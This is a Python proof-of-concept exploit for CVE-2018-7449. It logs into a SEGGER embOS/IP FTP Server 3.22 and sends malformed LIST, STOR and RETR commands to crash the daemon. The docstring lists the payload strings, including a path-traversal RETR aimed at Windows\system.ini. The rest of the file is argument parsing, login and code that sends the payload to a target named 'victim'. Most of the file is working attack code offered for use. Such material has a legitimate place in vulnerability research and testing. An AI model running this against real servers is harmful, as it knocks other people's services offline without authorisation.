#!/usr/bin/env python3
"""
	Credits: 	John Page (aka hyp3rlinx)		
	Website: 	hyp3rlinx.altervista.org
	Source:		http://hyp3rlinx.altervista.org/advisories/SEGGER-embOS-FTP-SERVER-v3.22-FTP-COMMANDS-DENIAL-OF-SERVICE.txt

	Name: CVE-2018-7449

	Description:	SEGGER embOS/IP FTP Server 3.22 allows
					remote attackers to cause a denial of service 
					(daemon crash) via an invalid LIST, STOR,
					or RETR command.

	Bad chars:		STOR 666\r\n
					LIST\r\n
					RETR '+'..\\'*8+'Windows\system.ini\r\n
	
	Exploit type:	DoS (denial of service)
	
	Platform: 		Unix, Windows
	
	Vendor: 		www.segger.com
"""

#coding=utf-8

#	
#	[+] this script was created from: antogit-sys *
#	[+] URL: https://github.com/antogit-sys/CVE-2018-7449
#	[+] LICENSE: GPLv3
#

import argparse
from exploitFTPModule import *


def main(victim, port, username, password):
	"""Open an FTP session to (victim, port) and pass it to exec_exploit.

	An ExploitFTPSegger object is built for the target and connectServer()
	is called on it. If that call returns False the session is closed and
	a failure message is printed. Otherwise the returned value is forwarded
	to exec_exploit together with the credentials.
	"""
	session = ExploitFTPSegger(victim, port)
	print("[*] Starting Exploit... 🚀")
	print(f"[*] Connect ftp in ({victim}, {port})")

	banner = session.connectServer()

	# Equality with False is kept on purpose: the return contract of
	# connectServer() is not visible in this file, so only False is treated
	# as "connection failed".
	if banner == False:
		session.close_connection()
		print("[✘] failed to connect !!")
		return

	print("[*] Execute Exploit...")
	exec_exploit(session, username, password, banner)


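def exec_exploit(efs, username, password, r):
	"""Run the CVE-2018-7449 proof of concept over an already-connected session.

	The server banner must contain "embOS/IP"; any other banner aborts before
	login. After a successful login the command strings held in
	``efs.badchars`` are echoed and then sent with ``efs.send_badchars()``.

	Args:
		efs: connected session object; this function uses its ``ip``,
			``badchars``, ``login``, ``send_badchars`` and
			``close_connection`` members.
		username: FTP account name passed to ``efs.login``.
		password: FTP password passed to ``efs.login``; it is not echoed.
		r: value returned by the connect step, converted with ``str()`` and
			treated as the server banner.

	The session is closed on every path, including a banner mismatch and an
	exception raised while logging in or sending.
	"""
	# Imported locally so this function does not depend on the wildcard
	# import at the top of the file re-exporting sleep.
	from time import sleep

	bannerServer = str(r)
	print()
	try:
		# NOTE(review): this is a substring match on the product name only;
		# it does not verify the version named in the message below.
		if "embOS/IP" not in bannerServer:
			print("[✘] this exploit only works on embOS/IP FTP 3.22a servers !!")
			return

		print("[*] Server response:")
		print(bannerServer)
		print(f"\n[*] Login {efs.ip} server...")
		print(f" ... USER {username}")
		sleep(1)
		# The password is masked so it does not end up in terminal
		# scrollback or in captured output.
		print(" ... PASS " + "*" * 8)
		sleep(1)

		login_reply = efs.login(username, password)
		# Only an explicit False is treated as a rejected login; the return
		# contract of login() is not visible in this file.
		if login_reply == False:
			print("\n[✘] username or password incorrect !!")
			return

		print("\n[*] Server response:")
		print(login_reply)
		print("\n[*] Send Bad Chars... 💀")
		for bc in efs.badchars:
			print(" ... " + bc)
		efs.send_badchars()
	finally:
		# Previously the banner-mismatch path returned without closing the
		# session that the caller had opened.
		efs.close_connection()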

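if __name__ == "__main__":
	# Command-line entry point: parse the target address and credentials,
	# validate the port, then call main().
	import getpass  # only needed when the password is prompted for

	parser = argparse.ArgumentParser(description="simple python exploit using CVE-2018-7449")
	parser.add_argument("victim", help="Victim server IP embOS/IP FTP Server v3.22")
	parser.add_argument("port", type=int, help="Port server IP embOS/IP FTP Server v3.22")
	parser.add_argument("username", help="username login")
	# passwd stays positional so existing invocations keep working, but it is
	# now optional: a password given on the command line is visible in the
	# process list and in shell history, so omitting it falls back to a
	# no-echo prompt.
	parser.add_argument("passwd", nargs="?", default=None, help="password login (prompted for if omitted)")
	args = parser.parse_args()

	# type=int accepts any integer; reject values that are not valid TCP ports.
	if not 1 <= args.port <= 65535:
		parser.error(f"port must be between 1 and 65535, got {args.port}")

	passwd = args.passwd if args.passwd is not None else getpass.getpass("password login: ")
	main(args.victim, args.port, args.username, passwd)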